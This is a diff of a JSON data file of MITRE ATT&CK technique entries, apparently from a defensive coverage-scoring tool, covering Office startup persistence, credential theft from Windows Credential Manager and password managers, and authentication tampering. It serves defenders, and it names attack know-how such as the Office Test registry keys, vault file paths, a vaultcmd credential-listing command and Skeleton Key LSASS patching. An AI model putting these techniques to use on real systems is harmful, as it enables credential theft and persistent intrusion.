+        "adjusted_score": 0.1380952380952381,
         "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
-        "has_splunk": true,
+        "has_splunk": false,
         "cis_controls": [
-            "3.12",
-            "4.1",
-            "4.2",
-            "4.4",
-            "4.7",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2",
-            "6.3",
-            "6.4",
-            "6.5",
-            "11.3",
-            "11.4",
-            "12.2",
-            "12.8",
-            "18.3",
-            "18.5"
-        ],
-        "nist_controls": [
-            "AC-2",
-            "AC-20",
-            "AC-3",
-            "AC-4",
-            "AC-5",
-            "AC-6",
-            "CM-5",
-            "CM-6",
-            "CM-7",
-            "IA-2",
-            "IA-5",
-            "SC-46",
-            "SC-7",
-            "SI-4",
-            "SI-7"
+            "14.3"
         ],
+        "nist_controls": [],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.419047619047619,
-            "mitigation_score": 0.6,
-            "detection_score": 0.22
-        },
-        "choke_point_score": 0.25,
-        "prevalence_score": 0.00029615
+        "hardware_coverage": false
     },
     {
-        "tid": "T1137",
-        "name": "Office Application Startup",
-        "description": "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.\n\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)",
-        "url": "https://attack.mitre.org/techniques/T1137",
+        "tid": "T1555.004",
+        "name": "Credentials from Password Stores: Windows Credential Manager",
+        "description": "Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)\n\nThe Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.\n\nCredential Lockers store credentials in encrypted .vcrd files, located under %Systemdrive%\\Users\\\\[Username]\\AppData\\Local\\Microsoft\\\\[Vault/Credentials]\\. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)\n\nAdversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers. Adversaries may also abuse Windows APIs such as CredEnumerateA to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)\n\nAdversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)",
+        "url": "https://attack.mitre.org/techniques/T1555/004",
         "tactics": [
-            "Persistence"
+            "Credential Access"
         ],
-        "detection": "Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.\n\nMany Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)\n\nMicrosoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)",
+        "detection": "Monitor process and command-line parameters of vaultcmd.exe for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”).(Citation: Malwarebytes The Windows Vault)\n\nConsider monitoring API calls such as CredEnumerateA that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)\n\nConsider monitoring file reads to Vault locations, %Systemdrive%\\Users\\\\[Username]\\AppData\\Local\\Microsoft\\\\[Vault/Credentials]\\, for suspicious activity.(Citation: Malwarebytes The Windows Vault)",
         "platforms": [
-            "Office 365",
             "Windows"
         ],
         "data_sources": [
-            "Application Log: Application Log Content",
             "Command: Command Execution",
-            "File: File Creation",
-            "File: File Modification",
-            "Module: Module Load",
-            "Process: Process Creation",
-            "Windows Registry: Windows Registry Key Creation",
-            "Windows Registry: Windows Registry Key Modification"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1137.001",
-                "name": "Office Application Startup: Office Template Macros",
-                "url": "https://attack.mitre.org/techniques/T1137/001",
-                "description": "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) \n\nWord Normal.dotm location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel Personal.xlsb location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) \n\nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.",
-                "detection": "Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    },
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    }
-                ]
-            },
-            {
-                "tid": "T1137.002",
-                "name": "Office Application Startup: Office Test",
-                "url": "https://attack.mitre.org/techniques/T1137/002",
-                "description": "Adversaries may abuse the Microsoft Office \"Office Test\" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)\n\nThere exist user and global Registry keys for the Office Test feature:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Office test\\Special\\Perf\n\nAdversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.",
-                "detection": "Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)\n\nConsider monitoring Office processes for anomalous DLL loads.",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    },
-                    {
-                        "mid": "M1054",
-                        "name": "Software Configuration",
-                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                        "url": "https://attack.mitre.org/mitigations/M1054"
-                    }
-                ]
-            },
-            {
-                "tid": "T1137.003",
-                "name": "Office Application Startup: Outlook Forms",
-                "url": "https://attack.mitre.org/techniques/T1137/003",
-                "description": "Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)\n\nOnce malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)",
-                "detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    },
-                    {
-                        "mid": "M1051",
-                        "name": "Update Software",
-                        "description": "Perform regular software updates to mitigate exploitation risk.",
-                        "url": "https://attack.mitre.org/mitigations/M1051"
-                    }
-                ]
-            },
-            {
-                "tid": "T1137.004",
-                "name": "Office Application Startup: Outlook Home Page",
-                "url": "https://attack.mitre.org/techniques/T1137/004",
-                "description": "Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)\n\nOnce malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)\n",
-                "detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    },
-                    {
-                        "mid": "M1051",
-                        "name": "Update Software",
-                        "description": "Perform regular software updates to mitigate exploitation risk.",
-                        "url": "https://attack.mitre.org/mitigations/M1051"
-                    }
-                ]
-            },
-            {
-                "tid": "T1137.005",
-                "name": "Office Application Startup: Outlook Rules",
-                "url": "https://attack.mitre.org/techniques/T1137/005",
-                "description": "Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)\n\nOnce malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)",
-                "detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    },
-                    {
-                        "mid": "M1051",
-                        "name": "Update Software",
-                        "description": "Perform regular software updates to mitigate exploitation risk.",
-                        "url": "https://attack.mitre.org/mitigations/M1051"
-                    }
-                ]
-            },
-            {
-                "tid": "T1137.006",
-                "name": "Office Application Startup: Add-ins",
-                "url": "https://attack.mitre.org/techniques/T1137/006",
-                "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)\n\nAdd-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. ",
-                "detection": "Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    }
-                ]
-            }
+            "File: File Access",
+            "Process: OS API Execution",
+            "Process: Process Creation"
         ],
+        "is_subtechnique": true,
+        "supertechnique": "T1555",
+        "subtechniques": [],
         "mitigations": [
-            {
-                "mid": "M1040",
-                "name": "Behavior Prevention on Endpoint",
-                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                "url": "https://attack.mitre.org/mitigations/M1040"
-            },
             {
                 "mid": "M1042",
                 "name": "Disable or Remove Feature or Program",
                 "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
                 "url": "https://attack.mitre.org/mitigations/M1042"
-            },
-            {
-                "mid": "M1054",
-                "name": "Software Configuration",
-                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                "url": "https://attack.mitre.org/mitigations/M1054"
-            },
-            {
-                "mid": "M1051",
-                "name": "Update Software",
-                "description": "Perform regular software updates to mitigate exploitation risk.",
-                "url": "https://attack.mitre.org/mitigations/M1051"
             }
         ],
-        "cumulative_score": 0.3902838157142857,
-        "adjusted_score": 0.3902838157142857,
+        "cumulative_score": 0.10952380952380952,
+        "adjusted_score": 0.10952380952380952,
         "has_car": false,
         "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": false,
-        "cis_controls": [
-            "2.3",
-            "2.7",
-            "4.1",
-            "4.8",
-            "7.1",
-            "7.2",
-            "7.3",
-            "7.4",
-            "7.5",
-            "7.7",
-            "9.4",
-            "18.3",
-            "18.5"
-        ],
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
         "nist_controls": [
-            "AC-10",
-            "AC-17",
-            "AC-6",
             "CM-2",
             "CM-6",
-            "CM-8",
-            "RA-5",
-            "SC-18",
-            "SC-44",
-            "SI-2",
-            "SI-3",
-            "SI-4",
-            "SI-8"
+            "CM-7",
+            "IA-5",
+            "SI-4"
         ],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.2857142857142857,
-            "mitigation_score": 0.4727272727272727,
-            "detection_score": 0.08
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.00456953
+        "hardware_coverage": false
     },
     {
-        "tid": "T1140",
-        "name": "Deobfuscate/Decode Files or Information",
-        "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)",
-        "url": "https://attack.mitre.org/techniques/T1140",
+        "tid": "T1555.005",
+        "name": "Credentials from Password Stores: Password Managers",
+        "description": "Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)\n\nAdversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)\n Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)",
+        "url": "https://attack.mitre.org/techniques/T1555/005",
         "tactics": [
-            "Defense Evasion"
+            "Credential Access"
         ],
-        "detection": "Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [certutil](https://attack.mitre.org/software/S0160).\n\nMonitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.",
+        "detection": "Consider monitoring API calls, file read events, and processes for suspicious activity that could indicate searching in process memory of password managers. \n\nConsider monitoring file reads surrounding known password manager applications.",
         "platforms": [
             "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "File: File Modification",
-            "Process: Process Creation",
-            "Script: Script Execution"
+            "Command: Command Execution",
+            "File: File Access",
+            "Process: OS API Execution",
+            "Process: Process Access"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1555",
         "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.5678386847619047,
-        "adjusted_score": 0.5678386847619047,
-        "has_car": true,
+        "mitigations": [
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            }
+        ],
+        "cumulative_score": 0.17619047619047618,
+        "adjusted_score": 0.17619047619047618,
+        "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": true,
         "cis_controls": [],
-        "nist_controls": [],
+        "nist_controls": [
+            "CM-2",
+            "CM-6",
+            "IA-2",
+            "IA-5",
+            "SI-2",
+            "SI-4"
+        ],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.10476190476190475,
-            "detection_score": 0.22
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.36307678
+        "hardware_coverage": false
     },
     {
-        "tid": "T1176",
-        "name": "Browser Extensions",
-        "description": "Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)\n\nMalicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.\n\nPrevious to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)\n\nOnce the extension is installed, it can browse to websites in the background,(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence.\n\nThere have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware)",
-        "url": "https://attack.mitre.org/techniques/T1176",
+        "tid": "T1556",
+        "name": "Modify Authentication Process",
+        "description": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).\n\nAdversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.",
+        "url": "https://attack.mitre.org/techniques/T1556",
         "tactics": [
+            "Credential Access",
+            "Defense Evasion",
             "Persistence"
         ],
-        "detection": "Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.\n\nMonitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.\n\nOn macOS, monitor the command line for usage of the profiles tool, such as profiles install -type=configuration. Additionally, all installed extensions maintain a plist file in the /Library/Managed Preferences/username/ directory. Ensure all listed files are in alignment with approved extensions.(Citation: xorrior chrome extensions macOS)",
+        "detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference. \n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)\n\nMonitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) \n\nMonitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nMonitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: Xorrior Authorization Plugins)\n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).",
         "platforms": [
             "Linux",
+            "Network",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Command: Command Execution",
             "File: File Creation",
-            "Network Traffic: Network Connection Creation",
-            "Process: Process Creation",
-            "Windows Registry: Windows Registry Key Creation"
+            "File: File Modification",
+            "Logon Session: Logon Session Creation",
+            "Module: Module Load",
+            "Process: OS API Execution",
+            "Process: Process Access",
+            "Windows Registry: Windows Registry Key Modification"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
-        "subtechniques": [],
+        "subtechniques": [
+            {
+                "tid": "T1556.001",
+                "name": "Modify Authentication Process: Domain Controller Authentication",
+                "url": "https://attack.mitre.org/techniques/T1556/001",
+                "description": "Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. \n\nMalware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)",
+                "detection": "Monitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)\n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g. a user has an active login session but has not entered the building or does not have VPN access). ",
+                "mitigations": [
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1025",
+                        "name": "Privileged Process Integrity",
+                        "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.",
+                        "url": "https://attack.mitre.org/mitigations/M1025"
+                    }
+                ]
+            },
+            {
+                "tid": "T1556.002",
+                "name": "Modify Authentication Process: Password Filter DLL",
+                "url": "https://attack.mitre.org/techniques/T1556/002",
